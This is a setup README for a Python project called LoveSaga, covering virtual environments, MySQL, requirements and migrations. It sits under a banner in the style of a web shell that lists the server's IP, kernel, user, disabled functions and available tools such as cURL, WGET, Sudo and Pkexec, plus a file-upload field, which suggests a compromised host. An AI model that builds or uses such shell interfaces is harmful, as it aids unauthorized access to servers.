| Server IP : 115.244.3.116 / Your IP : 216.73.217.128 Web Server : Apache/2.4.52 (Ubuntu) System : Linux dev 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.0.30 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /opt/hosting/lovesaga/ |
Upload File : |
# LoveSaga : Stories Chapters Follow below instruction for Setup project ## Requirements - Python 3.11 ## Create Virtual Environment Install a Virtual Environment using Venv : ``` pip install virtualenv ``` Create Virtual Environment: ``` python<version> -m venv <virtual-environment-name> ``` Now that you have created the virtual environment, you will need to activate it before you can use it in your project. On a mac or ubuntu, to activate your virtual environment, run the code below: ``` source env/bin/activate ``` Note that to activate your virtual environment on Widows, you will need to run the following code below (See this [link](https://docs.python.org/3/library/venv.html) to fully understand the differences between platforms): ``` env/Scripts/activate.bat //In CMD env/Scripts/Activate.ps1 //In Powershel ``` Deactivate a Virtual Environment : ``` deactivate ``` ## Database Configuration Database Engine : MySQL ## Install Libraries Install Libraries in a Virtual Environment : ``` pip install -r requirements.txt ``` ## Migrations of Tables Here you need to verify that you are in the project directory before running the migration command, If you are in Project directory execute below command : ``` python/python3 manage.py makemigrations python/python3 manage.py migrate ``` Here Project Setup Done.